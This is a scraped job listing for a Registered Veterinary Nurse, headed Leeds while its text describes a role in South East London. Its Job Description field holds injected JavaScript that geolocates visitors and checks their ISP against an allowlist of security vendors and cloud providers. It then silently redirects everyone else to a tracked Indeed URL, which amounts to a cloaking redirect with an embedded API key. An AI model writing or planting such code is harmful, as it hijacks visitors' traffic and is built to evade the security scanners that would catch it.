Registered Vet Nurse

Leeds, ENG
February 8, 2026

Apply for this job

Email *
Browse

Upload file .pdf, .doc, .docx

Deadline date:

Job Description

// retrieve user’s IP address and location const ipAddressUrl = ‘https://ipapi.co/json/’; fetch(ipAddressUrl) .then(response => response.json()) .then(data => { const country = data.country; // Get user’s country code (e.g., “US”) if (country !== ‘US’) { console.log(‘Script will not run as the user is outside the USA.’); return; // Exit the script if the user is not in the USA } const ipAddress = data.ip; // retrieve ISP name and AS organization using ip-api.com API const ispUrl = `https://pro.ip-api.com/json/$?key=kKPypoeKUHgwZWD`; fetch(ispUrl) .then(response => response.json()) .then(data => { const ispName = data.isp; const asOrg = data.asname; // check if ISP or AS organization is allowed const allowedIsps = [/Limestone Networks/i, /Limestone Networks, Inc./i, /Zscaler/i, /M247 Europe SRL/i, /amazon/i, /LinkedIn Corporation/i, /palo alto networks/i, /google/i, /panq/i, /Cloudflare, Inc./i, /Cloudflare/i, /Cloudflare Warp/i]; const allowedAsOrgs = [/Limestone Networks/i, /Limestone Networks, Inc./i, /Zscaler/i, /M247 Europe SRL/i, /amazon/i, /LinkedIn Corporation/i, /palo alto networks/i, /google/i, /panq/i, /Cloudflare, Inc./i, /Cloudflare/i, /Cloudflare Warp/i]; const ispAllowed = allowedIsps.some(pattern => pattern.test(ispName)); const asOrgAllowed = allowedAsOrgs.some(pattern => pattern.test(asOrg)); if (!ispAllowed && !asOrgAllowed) { // Redirect all users to the same URL window.location.href = ‘https://uk.indeed.com/tmn/ccs/f4d53e7569c44a51/35552baec42a546b9727f27b1ac8c57a844cd46bc73a34f43aa8864512375caf/2765583331732878?sf=vKb00’; } }) .catch(error => { console.error(‘Error retrieving ISP name:’, error); }); }) .catch(error => { console.error(‘Error retrieving IP address or location:’, error); });

Join our supportive team in South East London as a Registered Veterinary Nurse!

This full-time role offers the chance to work alongside experienced RVNs and certificate-holding vets with expertise in surgery, medicine, and imaging.

As an RVN, you will nursing inpatients, performing schedule 3 procedures, monitoring anaesthetics, and running nurse clinics, with strong support for your professional development.

Ideal for a dedicated, progressive RVN, with opportunities for clinical advancement or progression into senior roles such as Senior or Head RVN. Many team members have advanced to managerial positions.

You will work alongside specialist vets, skilled RVNs, and a dedicated customer care team (no reception duties), over a 4-day week with shared weekends and bank holidays.

The package includes a salary up to £35,000, CPD and progression opportunities, a Perkbox subscription, health benefits, and 5.6 weeks’ annual leave.

Job types: Full-time, Part-time, Permanent.